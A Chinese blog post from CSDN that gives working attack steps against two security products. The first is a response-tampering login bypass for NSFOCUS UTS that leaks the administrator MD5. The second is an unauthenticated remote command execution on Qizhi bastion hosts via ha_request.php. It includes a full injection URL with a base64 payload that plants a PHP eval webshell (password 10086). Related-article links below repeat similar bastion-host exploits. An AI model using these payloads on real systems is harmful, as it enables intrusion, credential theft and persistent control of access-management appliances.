mysql堡垒机漏洞_绿盟UTS绕过登录/齐治堡垒机 rce

最新推荐文章于 2024-05-31 11:39:56 发布
最新推荐文章于 2024-05-31 11:39:56 发布
阅读量1.1k 收藏
点赞数
文章标签: mysql堡垒机漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39865440/article/details/113606421
版权

1.绿盟UTS绕过登录

随便输密码->修改返回包为True->放行->等待第二次拦截包->内含管理员MD5->替换MD5登录

直接请求接口:/webapi/v1/system/accountmanage/account

2.齐治堡垒机 rce

利用条件:无需登录:

第一

http://10.20.10.11/listener/cluster_manage.php 返回“OK”。

第二,执行以下链接即可 getshell,执行成功后,生成 PHP 一句话马

/var/www/shterm/resources/qrcode/lbj77.php 密码 10086,使用 BASE64 进行编码。这里假设 10.20.10.10 为堡垒机的 IP 地址。

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}-d|bash`|${IFS}|echo${IFS}

特征:

漏洞利用点:

https://10.20.10.10/ha_request.phpPoc 形式:${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}-d|bash`|${IFS}|echo${IFS}

weixin_39865440
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
绿盟 SAS堡垒机 local_user.php 权限绕过漏洞复现
0xSec
12-14 902
绿盟 SAS堡垒机 local_user.php接口处存在权限绕过漏洞,未经身份认证的攻击者可以访问他们通常无权访问的敏感资源,最终导致系统处于极度不安全状态。
中远麒麟堡垒机admin_commonuserSQL注入漏洞
xiaokp7的博客
09-13 425
中远麒麟依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化统一安全运维平台一-iAudit 统一安全运维平台。该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控,消除了传统运维过程中的盲区,实现了运维简单化、操作可控化、过程可视化,是企业 IT 内控最有效的管理平台。中远麒麟堡垒机admin.php接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
齐治堡垒机任意用户登录漏洞
maverickpig的博客
01-23 3995
2021年进入网络安全行业,作为网络安全的小白,分享一些自学基础教程给大家。希望在自己能体系化的总结自己已有的知识的同时,能对各位博友有所帮助。文章内容比较基础,都是参考了很多大神的文章,各位不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力! 由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。 工作中遇到的漏洞,记录一下,本文仅作学习之用,请勿进行网络犯罪,遵守《网络安全法》等相关法律法规。 漏洞说明 浙江齐
常见网络产品默认口令大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
05-31 1123
为简化流程,方便大家,固不设置“回复再给完整列表”。下面这张表就是当前最全列表。资产灯塔系统adminarlpass重庆普天 CP ADSL03rootroot中远麒麟堡垒机审计用户audit12345678中远麒麟堡垒机admin12345678中兴adsl841adminprivate中新金盾硬件防火墙admin123中新金盾信息安全管理系统adminzxsoft1234!@#$中控考勤机web3.0123456中国移动 禹路由(none)admin。
mysql网络数据库操作模块_15.mysql数据库操作与Paramiko模块
weixin_39874795的博客
01-28 212
堡垒机前戏开发堡垒机之前,先来学习Python的paramiko模块,该模块机遇SSH用于连接远程服务器并执行相关操作SSHClient用于连接远程服务器并执行基本命令基于用户名密码连接:importparamikotransport= paramiko.Transport(('hostname', 22))transport.connect(username='wupeiqi', passwor...
堡垒机无法连接win2012R2或win10.docx
09-24
堡垒机无法连接装有win10或win2012R2的虚拟机服务器时,需要设置下windows配置。工作经验总结,希望能帮助网络管理员们!
堡垒主机应用发布服务器配置
05-26
堡垒主机应用发布服务器配置 堡垒主机应用发布服务器配置是指使用堡垒主机系统实现对 BS、CS 类系统的单点登陆、密码代填等操作的服务器配置。这种配置方式可以采用虚拟机方式部署,对不能提供虚拟化部署方式的用户...
堡垒机使用手册
09-05
自己根据项目上的使用,编制的堡垒机的使用手册。方便大家学习使用。
常用图标库_绿盟.ppt
08-17
绿盟
qizhi_ssh:绕过齐治堡垒机1000台机器限制
05-11
系统介绍 适用于使用了 "齐治科技堡垒主机" 的企业 主要功能是利用中转手段,绕过商用1000台服务的限制 使得齐治支持10万台服务器登录 为啥做这个系统 公司里一开始引进了齐治堡垒机, 但是原生的系统有几个问题 a) 界面难看死了 b) 没办法关联项目 c) 最重要的是它只支持1000台记录的录入, 多了就无法通过堡垒机登录审计了 d) 录入机器贼麻烦 于是我就有了一个想法 可否封装一个web页面, 利用cookie模拟登陆的手法, 去调用齐治的接口, 获得它的session_id; 再利用session_id 去请求它的服务接口, 获得加密串 最后再拦截登录过程 在调用齐治前, 注入用户的账号密码到xshell软件的配置 然后再利用加密串调用齐治本身 最重要的是要绕过他1000台服务器的限制 !! 为公司节约成本 功能截图 开源版本功能阉割了,只有ip列表+登录按钮 机器列表 点击"登
齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)分析
aijin3040的博客
07-27 3601
一、基本信息   漏洞公告:https://www.cnvd.org.cn/flaw/show/1632201   补丁信息:该漏洞的修复补丁已发布,如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。 二、源代码分析   问题出现在ha_request.php文件,第37行的exec函数,$url为用户可控的变量,可见第33和34行。目光来到第23和24行,只要n...
mysql堡垒机漏洞_齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
weixin_39992483的博客
02-02 618
一、基本信息参考:https://www.cnvd.org.cn/flaw/show/1559039补丁信息:该漏洞的修复补丁已于2019年4月1日发布。如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。二、漏洞挖掘过程这是我第一次接触运维堡垒机,通过堡垒机登录目标服务器/应用,就像在本地直接打开一样,觉得很神奇。1、挖掘过程首先,在安装齐治运维堡垒机客户端软件ShtermClie...
绿盟 UTS 综合威胁探针管理员任意登录漏洞
m0_48520508的博客
09-21 1701
1、绿盟 UTS 综合威胁探针概述 绿盟全流量威胁分析解决方案针对原始流量进行采集和监控,对流量信息进行深度还原、存储、查询和分析,可以及时掌握重要信息系统相关网络安全威胁风险,及时检测漏洞、病毒木马、网络攻击情况,及时发现网络安全事件线索,及时通报预警重大网络安全威胁,调查、防范和打击网络攻击等恶意行为,保障重要信息系统的网络安全 2、漏洞描述 (1) 修改登录数据包 {“status”:false,“mag”:""} -> {“status”:tr
php探针getshell,绿盟 UTS 综合威胁探针管理员任意登录漏洞
weixin_32818587的博客
04-12 619
网络安全检测与防护技术国家地方联合工程研究中心1、绿盟 UTS 综合威胁探针概述绿盟全流量威胁分析解决方案针对原始流量进行采集和监控,对流量信息进行深度还原、存储、查询和分析,可以及时掌握重要信息系统相关网络安全威胁风险,及时检测漏洞、病毒***、网络***情况,及时发现网络安全事件线索,及时通报预警重大网络安全威胁,调查、防范和打击网络***等恶意行为,保障重要信息系统的网络安全 2、漏洞描述(...
mysql堡垒机漏洞_齐治堡垒机后台存在命令执行漏洞(CNVD-2019-17294)分析
weixin_42571280的博客
02-02 439
基本信息引用:https://www.cnvd.org.cn/flaw/show/CNVD-2019-17294补丁信息:该漏洞的修复补丁已于2019年6月25日发布。如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。漏洞复现如下图,通过在传递参数”service=`id`”,成功执行命令,并回显命令执行结果。源代码分析首先,定位到/audit/data_provider.php,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值